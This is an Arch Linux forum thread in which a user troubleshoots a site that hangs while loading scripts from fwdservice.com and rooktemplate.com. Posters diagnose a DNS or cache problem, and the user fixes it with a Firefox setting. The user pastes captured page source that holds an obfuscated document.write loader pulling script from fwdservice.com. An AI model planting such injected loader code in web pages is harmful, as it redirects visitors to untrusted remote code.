Information about fwdservice dot com?

cfr · 2013-09-05 21:42:42

Note that urls in this post are deliberately obfuscated.

Earlier today I tried to access www <dot> casponline <dot> org which is supposed to be the site of the California Association of School Psychologists. When I had trouble viewing content, I enabled javascript for two sites the page seemed to need: cdn <dot> rooktemplate <dot> com and fwdservice <dot> com. This didn't seem to help much. I went from blank content to perpetual loading.

As far as I can tell fwdservice is associated with Windows malware which redirects attempts to access various webpages to fwdservice's site. I am guessing this simply fails on Linux but does anybody know anything more about this? The information about Windows is what I gleaned from a web search but I am not sure how reliable it is or if there is more to this. Because I was on campus at the time, the university's rule set typically blocks malware sites. (E.g. a link which would take me somewhere at home will be blocked on campus.) Obviously that's only a certain proportion of what's out there, however, so it doesn't show the information isn't reliable.

I am pretty sure that casponline should be a legitimate site or used to be one as I've found links to it from enough kosher-looking pages for it to seem unlikely they are all fake. (And they are always pages about psychological research etc.)

WorMzy · 2013-09-05 21:49:14

It seems to work fine here, and a free malware scanner doesn't report any problems (http://scanurl.net/?u=casponline.org&ue … RL#results)

Could it be something you need to bring up with the university's IT help desk?

alphaniner · 2013-09-05 21:50:52

The primary website loaded fine for me with Noscript blocking everything (itself and caspwebcasts.org). I allowed 'itself' and nothing new appeared in the list, ie. no evidence of rooktemplate or fwdservice.

Maybe it was compromised and has been fixed, or maybe your DNS was poisoned?

Last edited by alphaniner (2013-09-05 21:52:39)

progandy · 2013-09-05 21:55:33

alphaniner wrote:

The primary website loaded fine for me with Noscript blocking everything (itself and caspwebcasts.org). I allowed 'itself' and nothing new appeared in the list, ie. no evidence of rooktemplate or fwdservice.
Maybe it was compromised and has been fixed, or maybe your DNS was poisoned?

Same for me.
The IP for casponline.org should be 68.171.213.42 (at least for me).

cfr · 2013-09-05 23:00:45

OK. If I ping casponline.org, I get the same ip (68.171.213.42). If I load that ip in my browser and allow it to load the script, it all looks fine. But if I load www.casponline.org, I get nothing and the source code for the page is completely different.

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script type="text/javascript">var NREUMQ=NREUMQ||[];NREUMQ.push(["mark","firstbyte",new Date().getTime()]);</script><title>Loading...</title>
<script src="http://cdn.rooktemplate.com/rmgdsc/newProcess.js?v3.1" type="text/javascript" language="javascript"></script>
</head>
<body>
<div id="rmgblock"></div>
	<script type="text/javascript" id="_rMG_fir">
var _pR="gkwrf="+"",_folio="775974688",_bkt="8171";
var _adPage="<scr"+"ipt id=\"_rMG_dyn\" type=\"text/javascript\" language=\"JavaScript\""+" src=\"http://fwdservice.com/main.php?dmn="+"casponline.org"+"&folio="+_folio+"&"+_pR+"&bkt="+_bkt+"\">"+ "</scr" + "ipt>";
document.write(_adPage);
</script>
<script type="text/javascript">if(!NREUMQ.f){NREUMQ.f=function(){NREUMQ.push(["load",new Date().getTime()]);var e=document.createElement("script");e.type="text/javascript";e.src=(("http:"===document.location.protocol)?"http:":"https:")+"//"+"js-agent.newrelic.com/nr-100.js";document.body.appendChild(e);if(NREUMQ.a)NREUMQ.a();};NREUMQ.a=window.onload;window.onload=NREUMQ.f;};NREUMQ.push(["nrfj","beacon-2.newrelic.com","6bc175e1c8","2059687","blxaMRFVWEFSUENfWVcWbRcKG19cV1ZPGEZRSQ==",0,118,new Date().getTime(),"","","","",""]);</script></body></html>

I get the same result at home as on campus (but I'm on the same machine). So how would my DNS get poisoned and can I unpoison it?

Though if DNS was poisoned, wouldn't it affect ping as well?

EDIT: I just sshed into a machine at work (which I am about to lose, but still for today...) and found that ping www.casponline.com uses an ip address of 107.20.206.69. So could that have been the address I got given earlier when using my laptop on campus? Now I'm home so I get the right result from ping. But why would firefox still use the same ip as earlier? I tried removing the cache but it didn't make any difference. Is there something further I need to do? (And is this likely to indicate a more serious problem?)

The machine I sshed to is running Fedora 19 so it is definitely not likely to be an Arch-specific screw-up on my part, if you see what I mean.

Last edited by cfr (2013-09-05 23:32:14)

cfr · 2013-09-05 23:52:52

I hope I will be excused for a new post at this point as I edited the last one a number of times.

So here is how I resolved the issue in firefox:
* about:config
* change network.dnsCacheExpirationGracePeriod from 2592000 to 0
* visit www.casponline.com -> get correct site
* change network.dnsCacheExpirationGracePeriod from 0 back to default 2592000

Questions:
* is the default a good value for this setting?
* is my machine likely to be compromised in other ways?
* is the university network likely to be untrustworthy in other ways?!

Arch Linux

#1 2013-09-05 21:42:42

Information about fwdservice dot com?

#2 2013-09-05 21:49:14

Re: Information about fwdservice dot com?

#3 2013-09-05 21:50:52

Re: Information about fwdservice dot com?

#4 2013-09-05 21:55:33

Re: Information about fwdservice dot com?

#5 2013-09-05 23:00:45

Re: Information about fwdservice dot com?

#6 2013-09-05 23:52:52

Re: Information about fwdservice dot com?

Board footer